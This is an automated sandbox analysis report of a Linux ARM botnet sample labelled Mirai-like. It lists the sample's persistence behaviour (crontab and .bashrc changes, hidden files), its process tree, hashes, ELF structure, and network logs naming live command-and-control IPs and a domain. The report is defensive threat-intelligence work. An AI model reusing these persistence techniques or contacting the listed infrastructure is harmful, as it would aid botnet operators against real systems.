Edit tour
Linux
Analysis Report
nsharm7.elf
Overview
General Information
Sample name: | nsharm7.elf |
Analysis ID: | 1542859 |
MD5: | ca210ee9b185a078d977e3f9f421e2da |
SHA1: | 99a8fdf8489095caf3ba316f5f75561400bb64d5 |
SHA256: | d105ded953a4f0bb32f38178fea5cb27ff01e1a3ec7958386fc973653bb3d125 |
Tags: | elfuser-abuse_ch |
Infos: |
Detection
Score: | 60 |
Range: | 0 - 100 |
Whitelisted: | false |
Signatures
Multi AV Scanner detection for submitted file
Executes the "crontab" command typically for achieving persistence
Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions
Sample tries to persist itself using cron
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Found strings indicative of a multi-platform dropper
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)
Classification
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1542859 |
Start date and time: | 2024-10-26 19:16:56 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 53s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | defaultlinuxfilecookbook.jbs |
Analysis system description: | Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11) |
Analysis Mode: | default |
Sample name: | nsharm7.elf |
Detection: | MAL |
Classification: | mal60.troj.linELF@0/3@8/0 |
- VT rate limit hit for: nsharm7.elf
Command: | /tmp/nsharm7.elf |
PID: | 5549 |
Exit Code: | 0 |
Exit Code Info: | |
Killed: | False |
Standard Output: | you are now apart of hail cock botnet |
Standard Error: | no crontab for root /bin/sh: 1: /sbin/initctl: not found |
- system is lnxubuntu20
- nsharm7.elf New Fork (PID: 5551, Parent: 5549)
- sh New Fork (PID: 5554, Parent: 5551)
- nsharm7.elf New Fork (PID: 5556, Parent: 5549)
- sh New Fork (PID: 5558, Parent: 5556)
- nsharm7.elf New Fork (PID: 5559, Parent: 5549)
- nsharm7.elf New Fork (PID: 5601, Parent: 5559)
- nsharm7.elf New Fork (PID: 5561, Parent: 5549)
- cleanup
⊘No yara matches
⊘No Suricata rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | ReversingLabs: |
Source: | String: | ||
Source: | String: | ||
Source: | String: |
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | Socket: | Jump to behavior |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | String found in binary or memory: |
Source: | .symtab present: |
Source: | Classification label: |
Persistence and Installation Behavior |
---|
Source: | Crontab executable: | Jump to behavior | ||
Source: | Crontab executable: | Jump to behavior |
Source: | File written: | Jump to behavior |
Source: | File: | Jump to behavior | ||
Source: | File: | Jump to behavior |
Source: | File: | Jump to behavior |
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior |
Source: | Stderr: no crontab for root/bin/sh: 1: /sbin/initctl: not found: |
Source: | Queries kernel information via 'uname': | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 2 Scripting | Valid Accounts | 1 Scheduled Task/Job | 1 Unix Shell Configuration Modification | 1 Unix Shell Configuration Modification | 1 Hidden Files and Directories | OS Credential Dumping | 11 Security Software Discovery | Remote Services | Data from Local System | 1 Non-Standard Port | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Scheduled Task/Job | 1 Scheduled Task/Job | Rootkit | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | 2 Scripting | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
⊘No configs have been found
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
24% | ReversingLabs | Linux.Backdoor.Mirai |
⊘No Antivirus matches
⊘No Antivirus matches
⊘No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
daisy.ubuntu.com | 162.213.35.24 | true | false | unknown | |
kingstonwikkerink.dyn | 81.29.149.178 | true | false | unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
88.151.195.22 | unknown | Azerbaijan | 15723 | AZERONLINEAZ | false | |
193.233.193.45 | unknown | Russian Federation | 2895 | FREE-NET-ASFREEnetEU | false | |
81.29.149.178 | kingstonwikkerink.dyn | Switzerland | 39616 | COMUNICA_IT_SERVICESCH | false | |
91.149.218.232 | unknown | Poland | 198401 | GECKONET-ASPL | false |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
88.151.195.22 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
193.233.193.45 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
81.29.149.178 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
91.149.218.232 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
kingstonwikkerink.dyn | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
daisy.ubuntu.com | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
COMUNICA_IT_SERVICESCH | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
GECKONET-ASPL | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai, Moobot | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
AZERONLINEAZ | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
FREE-NET-ASFREEnetEU | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Stealc, Vidar | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
⊘No context
⊘No context
Process: | /tmp/nsharm7.elf |
File Type: | |
Category: | dropped |
Size (bytes): | 346 |
Entropy (8bit): | 4.726559471748614 |
Encrypted: | false |
SSDEEP: | 6:SqEeZK8z7oXKqWFIw3CaXQw3cjICQDMFDKXsJovYL8jndFKXsJovFkTFdVOYHIaU:GeZfUX9HACcTSICQg+GABjnOGAFkROS2 |
MD5: | 9722585F219A220A4DC2A0C49BD3B019 |
SHA1: | FFBA476658EA681147C570C6F2B16A79E7D38E19 |
SHA-256: | BB41836A1F2E11795C52739E7434247D90C0F8D391AFE759598BAA06E3657A8D |
SHA-512: | 77F16A70995A2650A397661D7B9CE3A83F4A5C01DC6EBC5E02B60A41D425246D37AB49478DC38EE3FC956775D90E9C86F911E0AC5E5DF6E142BCC82F8601D6E4 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | /tmp/nsharm7.elf |
File Type: | |
Category: | dropped |
Size (bytes): | 124 |
Entropy (8bit): | 4.380927423351128 |
Encrypted: | false |
SSDEEP: | 3:aKVMFDEIGXjQJZWvYKQzQRFxFdljEIGXjQJZWv1SeDkiJCF9:DMFDKXsJovYL8jndFKXsJovFkTF9 |
MD5: | 75D0F0790419BF1E1B797F768A7FD943 |
SHA1: | CB2B3673D8D5E7E9C6BE90C17EEE99EC7C005CC4 |
SHA-256: | 118CC2B37583BC923A21CB5BEF6EC2E968E10886519A5614664BDE7C74628183 |
SHA-512: | 1824A32B5178161E98599C3BD9186A52D5ED29B4BF727E3385550ABD4343DAEA43BD419DA51A11ADB958FCD0C43627C6070ECCDB480D033529FCB0AFB5A53CF1 |
Malicious: | true |
Reputation: | low |
Preview: |
Process: | /usr/bin/crontab |
File Type: | |
Category: | dropped |
Size (bytes): | 306 |
Entropy (8bit): | 5.156023571745438 |
Encrypted: | false |
SSDEEP: | 6:SUrpqoqQjEOP1KmREJOBFQkqZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jndFKXsJo0:8QjHig8deHLUHYC+GABjnOGAFkz |
MD5: | 82486729D8C5E7F3460E556463E6411A |
SHA1: | EACCB72BDD251127707630AA17A366A90139F03A |
SHA-256: | 89E065ED9157836279A379A06D2DA0AE8623E7D8D3294AC0487F16FD0A642BC7 |
SHA-512: | 521739E797659E779A7AB53304588A7E8BFBE55077CB64F73A963DB169C2865F60F4D21AF98579824C0EA4F1555D2F4AAEFC88245671B9F08FBF8EC52358CD61 |
Malicious: | true |
Reputation: | low |
Preview: |
File type: | |
Entropy (8bit): | 6.172622310669632 |
TrID: |
|
File name: | nsharm7.elf |
File size: | 103'696 bytes |
MD5: | ca210ee9b185a078d977e3f9f421e2da |
SHA1: | 99a8fdf8489095caf3ba316f5f75561400bb64d5 |
SHA256: | d105ded953a4f0bb32f38178fea5cb27ff01e1a3ec7958386fc973653bb3d125 |
SHA512: | fbbbda938ecfd86d1f0d6f445b32631dff779a29ebc936ca6379230555c1cb3d4a81e7cceaccf382775ce584012c0750e784a9c96de11ec0b16daf6036f9d02c |
SSDEEP: | 3072:JTnKSqnPWkyyRebaVf4GwBLFCsfIUuFeStQjX:JTnZmWkyDbaVf4GwBRCslusSOjX |
TLSH: | 36A30946B9819F11D4D621FAFB9E418933136FBCE3FA7101D920AF6423CA9DB0E76512 |
File Content Preview: | .ELF..............(.........4...@.......4. ...(........p............ ... ................................................................b..........................................Q.td..................................-...L..................@-.,@...0....S |
ELF header | |
---|---|
Class: | |
Data: | |
Version: | |
Machine: | |
Version Number: | |
Type: | |
OS/ABI: | |
ABI Version: | 0 |
Entry Point Address: | |
Flags: | |
ELF Header Size: | 52 |
Program Header Offset: | 52 |
Program Header Size: | 32 |
Number of Program Headers: | 5 |
Section Header Offset: | 102976 |
Section Header Size: | 40 |
Number of Section Headers: | 18 |
Header String Table Index: | 17 |
Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align |
---|---|---|---|---|---|---|---|---|---|---|
NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0 | 0 | 0 | ||
.init | PROGBITS | 0x80d4 | 0xd4 | 0x10 | 0x0 | 0x6 | AX | 0 | 0 | 4 |
.text | PROGBITS | 0x80f0 | 0xf0 | 0x16774 | 0x0 | 0x6 | AX | 0 | 0 | 16 |
.fini | PROGBITS | 0x1e864 | 0x16864 | 0x10 | 0x0 | 0x6 | AX | 0 | 0 | 4 |
.rodata | PROGBITS | 0x1e878 | 0x16878 | 0x1734 | 0x0 | 0x2 | A | 0 | 0 | 8 |
.ARM.extab | PROGBITS | 0x1ffac | 0x17fac | 0x18 | 0x0 | 0x2 | A | 0 | 0 | 4 |
.ARM.exidx | ARM_EXIDX | 0x1ffc4 | 0x17fc4 | 0x120 | 0x0 | 0x82 | AL | 2 | 0 | 4 |
.eh_frame | PROGBITS | 0x280e4 | 0x180e4 | 0x4 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.tbss | NOBITS | 0x280e8 | 0x180e8 | 0x8 | 0x0 | 0x403 | WAT | 0 | 0 | 4 |
.init_array | INIT_ARRAY | 0x280e8 | 0x180e8 | 0x4 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.fini_array | FINI_ARRAY | 0x280ec | 0x180ec | 0x4 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.jcr | PROGBITS | 0x280f0 | 0x180f0 | 0x4 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.got | PROGBITS | 0x280f4 | 0x180f4 | 0xac | 0x4 | 0x3 | WA | 0 | 0 | 4 |
.data | PROGBITS | 0x281a0 | 0x181a0 | 0x22c | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.bss | NOBITS | 0x283cc | 0x183cc | 0x5f24 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.comment | PROGBITS | 0x0 | 0x183cc | 0xdcc | 0x0 | 0x0 | 0 | 0 | 1 | |
.ARM.attributes | ARM_ATTRIBUTES | 0x0 | 0x19198 | 0x16 | 0x0 | 0x0 | 0 | 0 | 1 | |
.shstrtab | STRTAB | 0x0 | 0x191ae | 0x91 | 0x0 | 0x0 | 0 | 0 | 1 |
Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings |
---|---|---|---|---|---|---|---|---|---|---|---|
EXIDX | 0x17fc4 | 0x1ffc4 | 0x1ffc4 | 0x120 | 0x120 | 4.4793 | 0x4 | R | 0x4 | .ARM.exidx | |
LOAD | 0x0 | 0x8000 | 0x8000 | 0x180e4 | 0x180e4 | 6.1403 | 0x5 | R E | 0x8000 | .init .text .fini .rodata .ARM.extab .ARM.exidx | |
LOAD | 0x180e4 | 0x280e4 | 0x280e4 | 0x2e8 | 0x620c | 4.0945 | 0x6 | RW | 0x8000 | .eh_frame .tbss .init_array .fini_array .jcr .got .data .bss | |
TLS | 0x180e8 | 0x280e8 | 0x280e8 | 0x0 | 0x8 | 0.0000 | 0x4 | R | 0x4 | .tbss | |
GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x7 | RWE | 0x4 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Oct 26, 2024 19:17:47.914865017 CEST | 46308 | 8623 | 192.168.2.15 | 88.151.195.22 |
Oct 26, 2024 19:17:47.920839071 CEST | 8623 | 46308 | 88.151.195.22 | 192.168.2.15 |
Oct 26, 2024 19:17:47.920892954 CEST | 46308 | 8623 | 192.168.2.15 | 88.151.195.22 |
Oct 26, 2024 19:17:47.921093941 CEST | 46308 | 8623 | 192.168.2.15 | 88.151.195.22 |
Oct 26, 2024 19:17:47.926697969 CEST | 8623 | 46308 | 88.151.195.22 | 192.168.2.15 |
Oct 26, 2024 19:17:47.926739931 CEST | 46308 | 8623 | 192.168.2.15 | 88.151.195.22 |
Oct 26, 2024 19:17:47.932497025 CEST | 8623 | 46308 | 88.151.195.22 | 192.168.2.15 |
Oct 26, 2024 19:17:48.920926094 CEST | 8623 | 46308 | 88.151.195.22 | 192.168.2.15 |
Oct 26, 2024 19:17:48.921056986 CEST | 46308 | 8623 | 192.168.2.15 | 88.151.195.22 |
Oct 26, 2024 19:17:48.921171904 CEST | 8623 | 46308 | 88.151.195.22 | 192.168.2.15 |
Oct 26, 2024 19:17:48.921199083 CEST | 46308 | 8623 | 192.168.2.15 | 88.151.195.22 |
Oct 26, 2024 19:17:48.921318054 CEST | 46308 | 8623 | 192.168.2.15 | 88.151.195.22 |
Oct 26, 2024 19:17:53.936404943 CEST | 51746 | 19313 | 192.168.2.15 | 81.29.149.178 |
Oct 26, 2024 19:17:53.941946030 CEST | 19313 | 51746 | 81.29.149.178 | 192.168.2.15 |
Oct 26, 2024 19:17:53.942023993 CEST | 51746 | 19313 | 192.168.2.15 | 81.29.149.178 |
Oct 26, 2024 19:17:53.942023993 CEST | 51746 | 19313 | 192.168.2.15 | 81.29.149.178 |
Oct 26, 2024 19:17:53.947429895 CEST | 19313 | 51746 | 81.29.149.178 | 192.168.2.15 |
Oct 26, 2024 19:17:53.947489977 CEST | 51746 | 19313 | 192.168.2.15 | 81.29.149.178 |
Oct 26, 2024 19:17:53.952785969 CEST | 19313 | 51746 | 81.29.149.178 | 192.168.2.15 |
Oct 26, 2024 19:17:54.822705984 CEST | 19313 | 51746 | 81.29.149.178 | 192.168.2.15 |
Oct 26, 2024 19:17:54.822849989 CEST | 51746 | 19313 | 192.168.2.15 | 81.29.149.178 |
Oct 26, 2024 19:17:54.822963953 CEST | 51746 | 19313 | 192.168.2.15 | 81.29.149.178 |
Oct 26, 2024 19:18:04.863718987 CEST | 44828 | 20610 | 192.168.2.15 | 193.233.193.45 |
Oct 26, 2024 19:18:04.869218111 CEST | 20610 | 44828 | 193.233.193.45 | 192.168.2.15 |
Oct 26, 2024 19:18:04.869369984 CEST | 44828 | 20610 | 192.168.2.15 | 193.233.193.45 |
Oct 26, 2024 19:18:04.869369984 CEST | 44828 | 20610 | 192.168.2.15 | 193.233.193.45 |
Oct 26, 2024 19:18:04.874771118 CEST | 20610 | 44828 | 193.233.193.45 | 192.168.2.15 |
Oct 26, 2024 19:18:04.874826908 CEST | 44828 | 20610 | 192.168.2.15 | 193.233.193.45 |
Oct 26, 2024 19:18:04.880167961 CEST | 20610 | 44828 | 193.233.193.45 | 192.168.2.15 |
Oct 26, 2024 19:18:06.210983038 CEST | 20610 | 44828 | 193.233.193.45 | 192.168.2.15 |
Oct 26, 2024 19:18:06.211236954 CEST | 44828 | 20610 | 192.168.2.15 | 193.233.193.45 |
Oct 26, 2024 19:18:06.211318016 CEST | 44828 | 20610 | 192.168.2.15 | 193.233.193.45 |
Oct 26, 2024 19:18:16.253773928 CEST | 45492 | 11299 | 192.168.2.15 | 91.149.218.232 |
Oct 26, 2024 19:18:16.259500980 CEST | 11299 | 45492 | 91.149.218.232 | 192.168.2.15 |
Oct 26, 2024 19:18:16.259604931 CEST | 45492 | 11299 | 192.168.2.15 | 91.149.218.232 |
Oct 26, 2024 19:18:16.259905100 CEST | 45492 | 11299 | 192.168.2.15 | 91.149.218.232 |
Oct 26, 2024 19:18:16.265319109 CEST | 11299 | 45492 | 91.149.218.232 | 192.168.2.15 |
Oct 26, 2024 19:18:16.265422106 CEST | 45492 | 11299 | 192.168.2.15 | 91.149.218.232 |
Oct 26, 2024 19:18:16.270781994 CEST | 11299 | 45492 | 91.149.218.232 | 192.168.2.15 |
Oct 26, 2024 19:18:26.269819021 CEST | 45492 | 11299 | 192.168.2.15 | 91.149.218.232 |
Oct 26, 2024 19:18:26.275620937 CEST | 11299 | 45492 | 91.149.218.232 | 192.168.2.15 |
Oct 26, 2024 19:18:26.518765926 CEST | 11299 | 45492 | 91.149.218.232 | 192.168.2.15 |
Oct 26, 2024 19:18:26.518960953 CEST | 45492 | 11299 | 192.168.2.15 | 91.149.218.232 |
Oct 26, 2024 19:19:46.598206043 CEST | 45492 | 11299 | 192.168.2.15 | 91.149.218.232 |
Oct 26, 2024 19:19:46.788597107 CEST | 11299 | 45492 | 91.149.218.232 | 192.168.2.15 |
Oct 26, 2024 19:19:47.033083916 CEST | 11299 | 45492 | 91.149.218.232 | 192.168.2.15 |
Oct 26, 2024 19:19:47.033318996 CEST | 45492 | 11299 | 192.168.2.15 | 91.149.218.232 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Oct 26, 2024 19:17:47.893155098 CEST | 55358 | 53 | 192.168.2.15 | 194.36.144.87 |
Oct 26, 2024 19:17:47.903624058 CEST | 53 | 55358 | 194.36.144.87 | 192.168.2.15 |
Oct 26, 2024 19:17:48.023139954 CEST | 54227 | 53 | 192.168.2.15 | 194.36.144.87 |
Oct 26, 2024 19:17:48.033736944 CEST | 53 | 54227 | 194.36.144.87 | 192.168.2.15 |
Oct 26, 2024 19:17:49.218113899 CEST | 53314 | 53 | 192.168.2.15 | 8.8.8.8 |
Oct 26, 2024 19:17:49.218113899 CEST | 42630 | 53 | 192.168.2.15 | 8.8.8.8 |
Oct 26, 2024 19:17:49.224890947 CEST | 53 | 42630 | 8.8.8.8 | 192.168.2.15 |
Oct 26, 2024 19:17:49.225999117 CEST | 53 | 53314 | 8.8.8.8 | 192.168.2.15 |
Oct 26, 2024 19:17:53.924577951 CEST | 48681 | 53 | 192.168.2.15 | 194.36.144.87 |
Oct 26, 2024 19:17:53.935691118 CEST | 53 | 48681 | 194.36.144.87 | 192.168.2.15 |
Oct 26, 2024 19:17:59.825757027 CEST | 50720 | 53 | 192.168.2.15 | 139.84.165.176 |
Oct 26, 2024 19:18:04.832416058 CEST | 36607 | 53 | 192.168.2.15 | 80.152.203.134 |
Oct 26, 2024 19:18:04.862667084 CEST | 53 | 36607 | 80.152.203.134 | 192.168.2.15 |
Oct 26, 2024 19:18:11.215120077 CEST | 56763 | 53 | 192.168.2.15 | 64.176.6.48 |
Oct 26, 2024 19:18:16.222214937 CEST | 48207 | 53 | 192.168.2.15 | 65.21.1.106 |
Oct 26, 2024 19:18:16.250895023 CEST | 53 | 48207 | 65.21.1.106 | 192.168.2.15 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Oct 26, 2024 19:17:47.893155098 CEST | 192.168.2.15 | 194.36.144.87 | 0xd114 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 26, 2024 19:17:49.218113899 CEST | 192.168.2.15 | 8.8.8.8 | 0xdf28 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 26, 2024 19:17:49.218113899 CEST | 192.168.2.15 | 8.8.8.8 | 0x81b7 | Standard query (0) | 28 | IN (0x0001) | false | |
Oct 26, 2024 19:17:53.924577951 CEST | 192.168.2.15 | 194.36.144.87 | 0x3926 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 26, 2024 19:17:59.825757027 CEST | 192.168.2.15 | 139.84.165.176 | 0x63ae | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 26, 2024 19:18:04.832416058 CEST | 192.168.2.15 | 80.152.203.134 | 0x2510 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 26, 2024 19:18:11.215120077 CEST | 192.168.2.15 | 64.176.6.48 | 0xb89c | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 26, 2024 19:18:16.222214937 CEST | 192.168.2.15 | 65.21.1.106 | 0xe882 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Oct 26, 2024 19:17:47.903624058 CEST | 194.36.144.87 | 192.168.2.15 | 0xd114 | No error (0) | 81.29.149.178 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:17:47.903624058 CEST | 194.36.144.87 | 192.168.2.15 | 0xd114 | No error (0) | 31.13.248.89 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:17:47.903624058 CEST | 194.36.144.87 | 192.168.2.15 | 0xd114 | No error (0) | 86.107.100.80 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:17:47.903624058 CEST | 194.36.144.87 | 192.168.2.15 | 0xd114 | No error (0) | 91.149.218.232 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:17:47.903624058 CEST | 194.36.144.87 | 192.168.2.15 | 0xd114 | No error (0) | 195.133.92.51 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:17:47.903624058 CEST | 194.36.144.87 | 192.168.2.15 | 0xd114 | No error (0) | 91.149.238.18 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:17:47.903624058 CEST | 194.36.144.87 | 192.168.2.15 | 0xd114 | No error (0) | 88.151.195.22 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:17:47.903624058 CEST | 194.36.144.87 | 192.168.2.15 | 0xd114 | No error (0) | 185.82.200.181 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:17:47.903624058 CEST | 194.36.144.87 | 192.168.2.15 | 0xd114 | No error (0) | 194.87.198.29 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:17:47.903624058 CEST | 194.36.144.87 | 192.168.2.15 | 0xd114 | No error (0) | 193.233.193.45 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:17:47.903624058 CEST | 194.36.144.87 | 192.168.2.15 | 0xd114 | No error (0) | 213.182.204.57 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:17:49.225999117 CEST | 8.8.8.8 | 192.168.2.15 | 0xdf28 | No error (0) | 162.213.35.24 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:17:49.225999117 CEST | 8.8.8.8 | 192.168.2.15 | 0xdf28 | No error (0) | 162.213.35.25 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:17:53.935691118 CEST | 194.36.144.87 | 192.168.2.15 | 0x3926 | No error (0) | 194.87.198.29 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:17:53.935691118 CEST | 194.36.144.87 | 192.168.2.15 | 0x3926 | No error (0) | 193.233.193.45 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:17:53.935691118 CEST | 194.36.144.87 | 192.168.2.15 | 0x3926 | No error (0) | 213.182.204.57 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:17:53.935691118 CEST | 194.36.144.87 | 192.168.2.15 | 0x3926 | No error (0) | 81.29.149.178 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:17:53.935691118 CEST | 194.36.144.87 | 192.168.2.15 | 0x3926 | No error (0) | 31.13.248.89 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:17:53.935691118 CEST | 194.36.144.87 | 192.168.2.15 | 0x3926 | No error (0) | 86.107.100.80 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:17:53.935691118 CEST | 194.36.144.87 | 192.168.2.15 | 0x3926 | No error (0) | 91.149.218.232 | A (IP address) | IN (0x0001) | false | ||
